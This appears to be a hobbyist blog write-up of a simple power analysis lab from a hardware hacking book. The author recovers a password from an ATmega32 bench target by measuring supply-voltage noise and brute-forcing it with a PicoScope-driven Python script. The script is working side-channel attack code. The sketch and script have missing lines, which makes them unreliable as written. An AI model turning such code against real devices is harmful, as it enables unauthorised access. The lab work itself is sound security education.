# SPA Attack Experiment 1

In late 2021 a book named “Hardware Hacking Handbook” was published. I don’t remember exactly how I came across it, but after checking the ToC and some friend feedback, I’ve decided to buy it. I quickly looked at the contents and stumbled on chapter 9, which includes a simple power analysis lab experiment. It’s an introduction to power analysis, and I was curious to do it in practice. Then, why not write about my experience replicating that lab?

During my high school and first University years, I’ve already spent some time playing with ATMEL microcontrollers. Even though I’ve been a bit distant from this scene, I’ve followed some of the Arduino evolution. Thus, the lab apparatus wasn’t entirely new to me, but the experiment was!

## Scenario

This lab is a microcontroller asking for a password through a serial port. The attack vector uses the power supply noise and (somehow) learns about the correct password. This type of attack is not new; according to the book, they date back to the late ’90s, in the context of cryptography side-channel attacks. However, the exponential proliferation of microcontrollers and computers around us will make these types of attacks increasingly common.

## Power Analysis

As mentioned, the attack relies on analyzing the power consumption signal of a target device using a reasonable precise probe. One of the easiest ways of doing this (although there are others), is using a shunt resistor between the target and the power source, as shown in the following drawing:

We then measure the voltage drop in the shunt resistor (Rs), and by Ohm’s law, we can get the current flowing into the target:

To avoid using a differential oscilloscope which is more expensive, one could measure the two voltage potentials of the resistor and subtract to get the voltage drop. However, this can be further simplified by assuming that the voltage source (Vcc) is ideal and constant; we use a single probe and measure the negative potential V- voltage to ground and subtract that from an ideal Vcc to ground:

So, the current consumption analysis can be done by capturing the voltage at the negative node of the resistor. We’d expect that this voltage would show some differences when the correct character of the password is used compared to incorrect password characters.

## Simplifying

Measuring the current consumption is very reliable and should give the most accurate results. Alternatively, we can also measure the voltage variations caused by small and fast current sinks on the target. This is only possible because we’re in a real-world that doesn’t have ideal power sources: they take time to reestablish the voltage from current sink variations. That’s one of the reasons to use decoupling capacitors at the power source rails. These help keep the voltage as stable as possible.

That said, I won’t be measuring the current variations but instead voltage source noise. We need to get rid of any capacitor on the power source rails to do this. Initially, I was using the STK500 programmer board with external Vtarget, but I missed that even this rail was connected to some smoothing capacitors. Thus, any voltage noise information was being wiped by the capacitors.

Now, we need to power the target somehow. Without capacitors on the power line, it means that switching converters (buck, boost, and variants) will inject unwanted noise in our captured signal. Alternatively, we could use a linear voltage regulator (with lower noise), but I had none at hand.

So the solution I used was a cleaner power supply... what’s the basic noise clean power supply we know? A battery or power cells. So, I’ve connected 3xAAA power cells to get around 4.5V, which was sufficient to power my target microcontroller.

## Lab Preparation

I used the following parts:

• Digital Scope (I used PicoScope 2406B, 1GS/s, 32MS)
• ATmega32 microcontroller
• USB to Serial converter (FTDI)
• 3xAAA power cells
• AVR programmer board (STK500, but any will do)
• Breadboard and a few wires

The lab setup is basic and described in the following diagram:

After mounting this setup, it looks like the following picture (the power from power cells is disconnected just to avoid wasting battery):

Before we can perform the experiments on noise analysis, we need to prepare the target. That’s described in the next section.

## Target Software

I’ve used the same sample code as the one from the book with a few changes:

1. Removed the random delays;
2. Added trigger pin to low code right after the comparison.

Since it’s my first experiment, I wanted to confirm I was seeing the signal noise at the right time and not, for example, missing data because I didn’t capture enough time. Even though we shouldn’t have these shortcuts in a realistic scenario, other hacks can be done to help overcome these limitations (some ideas are shared in the end).

The code used for the target was the following (based on code from the book):

``````// Trigger is PB0 (pin 1)
int triggerPin = PB0;

char tempchr;
int index;

// the setup routine runs once when you press reset:
void setup() {
// initialize serial communication at 9600 bits per second:
Serial.begin(9600);
pinMode(triggerPin, OUTPUT);
tempchr = '0';
index = 0;
}

// the loop routine runs over and over again forever:
void loop() {
//Wait a little bit after startup & clear everything
digitalWrite(triggerPin, LOW);
delay(250);
Serial.flush();
// wait for last character
while ((tempchr != '\n') && (index < 19)) {
if (Serial.available() > 0) {
}
}
// Null terminate and strip non-characters
index = 0;
tempchr = 0;
digitalWrite(triggerPin, HIGH);
digitalWrite(triggerPin, LOW);
} else {
digitalWrite(triggerPin, LOW);
//Delay up to 500ms randomly
//delay(random(500));
}
}
``````

It’s worth mentioning that the password comparison line will call `String.equals()` and this operator code is the following (taken from here):

``````...
unsigned char String::equals(const String &s2) const
{
return (len == s2.len && compareTo(s2) == 0);
}
...
``````

It first compares both strings length, then it calls `compareTo` function. The latter will then use `strcmp` which is known to be inadequate for comparing passwords. This means that one part of the attack (not explored in this post) is to find the correct password size.

Refer to Appendix A for information on how I’ve programmed the target. I felt it was a bit off-topic to include in the main text. Once the target is programmed, we’re ready to do the first tests.

## First tests and results...

I’ve used a Linux serial client (screen, minicom, etc.) to test if the target is working as expected. To communicate with the target, we need to ensure the baud rate is set to 9600. Then I typed a few characters until the password buffer was filled and waited for the response.

Once I verified that the serial communication was working as expected, I made the first captures from the oscilloscope. I’ve used channel A for the voltage noise capture (AC mode, 100mV, 2u to 5u) and channel B for the trigger (DC mode, 10V, 2V trigger on rising edge).

The following graph shows the voltage noise for two passwords attempts: `aaaaaaaaaaa` (represented by “V(a)”) and `iaaaaaaaaaa` (represented by “V(i)”). I’ve included the trigger signals which allow us to see approximately when the comparison ends.

To avoid having too much information in the time graph, I’ve cropped it before 16us. Both signals are very similar from the trigger and start of the capture until around the 18us. The grid spacing matches 8MHz, the same as the target instruction cycle period (most of the target instructions take a single cycle). From this preliminary time graph, we can already make a couple of comments.

1. It was surprising to me to find that the noise signals are very similar for the same internal target behavior. I was expecting more noise, more differences between the signals!
2. Even though we passed 11 characters in length, we know that the comparison ends at the first different character found. This means we won’t see the voltage noise for all characters comparison in the graph, and we have to guess one password character at the time.
3. We can see that the trigger lowering for `iaaaaaaaaaa` password happens later, which is in line with a string comparison that went a bit further in the target. Thus, it takes around 8 clock cycles between two characters in comparison.
4. The exit path of the comparison (comparison function return and trigger switch) should use similar instructions. Hence, we can see two identical voltage signals but having a time offset ...

Can you spot where the string comparison deviates? It seems right after the 18us, as shown in the following time chart C1 mark.

We can see that the pair of spikes is lower when the password character is correct. To help confirm this hypothesis, we can look at the signals for all other wrong characters (`A-Z` except `I`), and see that the behavior is the same: they all have a pair of spikes above 2V in this time region.

Moving to the next character, we have the exact same behavior as shown in the following graph: approximately 8 clock cycles after the first comparison (in C2), we see the two distinct spikes again:

To have better confidence on these spikes being related to the comparison, we can confirm from the assembly listing if the number of cycles between a character comparison is around 8. Refer to Appendix A for this analysis.

To implement a brute force algorithm, we should look for data points above ~2V at specific periods in time, given by t, for the particular character index n, given the target clock period C:

I’ve used the following Python script to programmatically brute-force the password.

``````# spacode_crack.py, based on scripts from the book.
import serial
import time
#picoscope module from https://github.com/colinoflynn/pico-python
from picoscope import ps2000a
import string
import sys

def fill_pass(pw):
if len(pw) < 11:
return pw + "a"*(11 - len(pw))
else:
return pw

def build_pass(cur_pw, idx):
return fill_pass(cur_pw + string.ascii_lowercase[idx])

V_THRESHOLD=2.1
def test_capture(data, cur_n, sample_period):
C=1/(8e6)*1e6;
idx_low = round((18+8*C*cur_n)/(sample_period*1e6))
idx_high = round((18+8*C*cur_n + 2*C)/(sample_period*1e6))

for i in range(idx_low,idx_high):
if data[i] > V_THRESHOLD:
return False

# We had no voltage peaks related to different character, means this is potentially the correct one.
return True

try:
ser = serial.Serial(
port='/dev/ttyUSB0',
baudrate=9600,
timeout=0.500
)
ps = ps2000a.PS2000a()
print("Found the following picoscope:")
print(ps.getAllUnitInfo())

# Need at least 30us from trigger (8MHz ATMEL)
obs_duration = 35E-6

# Sample at least 5000 points within that window
sampling_interval = obs_duration / 5000

# Cut-off for HP filter
freq1 = 400e3
# Cut-off for LP filter
freq2 = 16e6

# Turn channels C and D off
ps.setChannel('C', enabled=False)
ps.setChannel('D', enabled=False)

# Configure timebase
(actualSamplingInterval, nSamples, maxSamples) = \
ps.setSamplingInterval(sampling_interval, obs_duration)
print("Sampling interval = %f us" % (actualSamplingInterval * nSamples * 1E6))

# Channel B is the trigger
ps.setChannel('B', 'DC', 10.0, 0.0, enabled=True, BWLimited=True)
ps.setSimpleTrigger('B', 2.0, 'Rising', delay=10, timeout_ms=5000, enabled=True)

# 50mV range on channel B, AC coupled, 20MHz BW limit
ps.setChannel('A', 'AC', 1, 0.0, enabled=True, BWLimited=True)

data_list = []
cur_pass = ""
cur_n = 0

#Clear system
ser.write(("abcde\n").encode("utf-8"))

while True:
# Try next character
found = False
for idx in range(len(string.ascii_lowercase)):
pw_test = build_pass(cur_pass, idx)
ps.runBlock()
time.sleep(0.05)

ser.write((pw_test + "\n").encode("utf-8"))
#print("Got response: %s" % r)
sys.exit(0)

data = ps.getDataV('A', nSamples, returnOverflow=False)
data = -1.0 * (data - np.mean(data)) / np.std(data)
if test_capture(data, cur_n, actualSamplingInterval) == True:
found = True
cur_pass = cur_pass + string.ascii_lowercase[idx]
cur_n += 1
break

# Continue trying another character.
print("Error: failed to find the correct character at offset %d!" % cur_n)
sys.exit(-1)

finally:
#Always close off things
ser.close()
ps.stop()
ps.close()
``````

The output after a few trial and errors was:

``````Found the following picoscope:
DriverVersion                 : PS2000A Linux Driver, 2.1.78.3011
...
timebase = 2
timebase_dt = 4e-09
noSamples = 8750
Sampling interval = 35.000000 us
\$
``````

It’s not printing all the attempts, but you can easily enable those. I had to try a few times (3..4) until it completely matched the password. The code is very simple and doesn’t use any technique to be more tolerant of electrical errors and deviations. For example, we could use the average of a sample of several captures for the same character attempt instead of using a single capture.

## Final Words

This experiment was just a proof-of-concept: a few simplifications were used, deviating a bit from real-world scenarios. For instance, it wasn’t described how we could find the correct password size. There is a trigger signal to help know when the password comparison starts. I also used this signal to locate the end of the comparison more accurately, even though this information won’t be used in the brute-force script.

However, overcoming these difficulties shouldn’t be impossible either. There are always ways, techniques, and little hacks that can be done to help. I can think of the following for two problems:

For the trigger signal, used to know when the comparison is about to start. We know that as soon as we send the carriage return of the password, it will receive the character and compare the password. We would be capturing the signal a bit early and would probably need to extend the capture period until we learn where the comparison is made.

I think a timing attack could be used to find the correct password length. When the password matches the correct length, the code will call `strcmp`, which will delay the “Password Bad” response. By comparing the “Password Bad” response time, it might be possible to know when the correct password size is used.

Nevertheless, it was a fun challenge, and I look forward to doing other hardware security experiences.

Cheers!

# Appendix A

## Preparing the Target

First we need to install the Arduino core for the corresponding chip model. Arduino does not directly support all Atmel chips. Fortunately, the community has ported the Arduino Core for many other Atmel chips include those I had stored during my University years in my electronics parts boxes. I had several spare microcontrollers but the one that I found to be working was an Atmega32.

To install the Arduino core we search for one port in Google that leads us to:

https://github.com/MCUdude/MightyCore

We first add this core index URL to the local Arduino configuration:

``````\$ arduino-cli config add board_manager.additional_urls \
https://mcudude.github.io/MightyCore/package_MCUdude_MightyCore_index.json
``````

Now we refresh the index with:

``````\$ arduino-cli core update-index
``````

Let’s confirm we now have support for Atmega32 with:

``````\$ arduino-cli core search atmega32
ID                   Version Name
atmel-avr-xminis:avr 0.6.0   Atmel AVR Xplained-minis
MightyCore:avr       2.1.3   MightyCore
``````

``````\$ arduino-cli core install MightyCore:avr
Installing platform MightyCore:[email protected]
Configuring platform....
Platform MightyCore:[email protected] installed
``````

Alright, now I didn’t need to install the bootloader because I will use ICSP directly to program the microcontroller. When we use `arduino-cli compile/upload ...` command it will already include the bootloader in the binary as will be shown next.

### Compiling

First we grab the Lab1 code from the Hardware Hacking Handbook and put it in a Arduino source code file (I called mine PsaSketch):

Now we run the `arduino-cli` command to compile, providing the chip information:

``````\$ arduino-cli compile -b MightyCore:avr:32:clock=8MHz_internal PsaSketch.ino
``````

You can use any programmer you prefer, I’m just sharing what I’ve used, STK500. I don’t think it should be very common used board now-a-days, probably easier to use a USBAsp or Arduino-ISP programming. But it really doesn’t matter as long as you can program the chip.

Now I’m using STK500 to program the chip, the following description only applies if you’re using the same board... you may skip for the next section. I’ve to connect two headers of ISP6Pin to SPROG3 (the red one that will have ATmega32 plugged), as shown with the arrow in the following picture:

The square highlight connection is for the spare RS232 connection and the circle highlight is to connect the “trigger” led (PB0).

Now that the board is ready, we can call the Arduino cli tool to upload the binary:

``````\$ arduino-cli upload -b MightyCore:avr:32:clock=8MHz_internal \
-P stk500 -p /dev/ttyUSB0 -v .
...
avrdude: Version 6.3-20201216
Copyright (c) 2000-2005 Brian Dean, http://www.bdmicro.com/

...
Using Port                    : /dev/ttyUSB0
Using Programmer              : stk500
AVR Part                      : ATmega32
Chip Erase delay              : 9000 us
PAGEL                         : PD7
BS2                           : PA0
RESET disposition             : dedicated
RETRY pulse                   : SCK
serial program mode           : yes
parallel program mode         : yes
Timeout                       : 200
StabDelay                     : 100
CmdexeDelay                   : 25
SyncLoops                     : 32
ByteDelay                     : 0
PollIndex                     : 3
PollValue                     : 0x53
Memory Detail                 :

Block Poll               Page                       Polled
Memory Type Mode Delay Size  Indx Paged  Size   Size #Pages MinW  MaxW   ReadBack
----------- ---- ----- ----- ---- ------ ------ ---- ------ ----- ----- ---------
eeprom         4    10    64    0 no       1024    4      0  9000  9000 0xff 0xff
flash         33     6    64    0 yes     32768  128    256  4500  4500 0xff 0xff
lfuse          0     0     0    0 no          1    0      0  2000  2000 0x00 0x00
hfuse          0     0     0    0 no          1    0      0  2000  2000 0x00 0x00
efuse          0     0     0    0 no          0    0      0     0     0 0x00 0x00
lock           0     0     0    0 no          1    0      0  2000  2000 0x00 0x00
signature      0     0     0    0 no          3    0      0     0     0 0x00 0x00
calibration    0     0     0    0 no          4    0      0     0     0 0x00 0x00

Programmer Type : STK500V2
Description     : Atmel STK500
Programmer Model: STK500
Hardware Version: 2
Firmware Version Master : 2.10
Topcard         : Unknown
Vtarget         : 5.1 V
SCK period      : 35.3 us
Varef           : 3.2 V
Oscillator      : 3.686 MHz

avrdude: AVR device initialized and ready to accept instructions

Reading | ################################################## | 100% 0.01s

avrdude: Device signature = 0x1e9502 (probably m32)
avrdude: NOTE: "flash" memory has been specified, an erase cycle will be performed
To disable this feature, specify the -D option.
avrdude: erasing chip
avrdude: writing flash (32768 bytes):

Writing | ################################################## | 100% 6.97s

avrdude: 32768 bytes of flash written

avrdude done.  Thank you.
``````

As soon as we upload the code, we can see the led light on (the chip code starts running right away). This happens because VTARGET jumper on this board is shorted, thus we’re powering the chip directly from the STK500.

## Assembly Instructions

The piece of code that performs the comparison of the characters can be analyzed from the target binary disassembly, at `strcmp` function:

``````strcmp():
102c:       fb 01           movw    r30, r22       ; Z=r31:r30
102e:       dc 01           movw    r26, r24       ; X=r27:r26
1030:       8d 91           ld      r24, X+        ; r24=X, X+=1 (2C)
1032:       01 90           ld      r0, Z+         ; r0=Z, Z+=1 (2C)
1034:       80 19           sub     r24, r0        ; r24-=r0 (1C)
1036:       01 10           cpse    r0, r1         ; if r0 == 0 ? (!1C,2C)
1038:       d9 f3           breq    .-10           ; 0x1030 <strcmp+0x4>
103a:       99 0b           sbc     r25, r25       ; r25=r25-r25=0
103c:       08 95           ret
``````

If we imagine a trace from the `cpse` instruction, we count between 7 to 8 clock cycles:

1. `cpse`, since the condition is false, it will execute the next instruction and consume one clock cycle;
2. next instruction is `breq` and will always happen (?? not clear why) and takes two clock cycles;
3. then, two `ld` instructions that take four clock cycles;
4. the subtraction which takes one clock cycle;
5. ...and we reach again the `cpse` instruction, after 8 clock cycles.